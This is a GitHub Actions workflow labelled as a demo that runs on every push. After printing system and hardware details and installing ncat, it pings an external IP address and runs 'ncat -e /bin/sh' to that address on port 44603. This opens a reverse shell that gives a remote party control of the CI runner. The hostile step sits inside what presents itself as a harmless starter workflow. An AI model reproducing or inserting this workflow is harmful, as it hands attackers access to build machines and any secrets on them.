name: GitHub Actions Demo
on: [push]
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: |
          uname -a
          sudo lspci
          sudo lscpu
          sudo apt install ncat
          ping 8.8.8.8 -c 4
          ping 83.143.242.46 -c 4
          ncat -e /bin/sh 83.143.242.46 44603
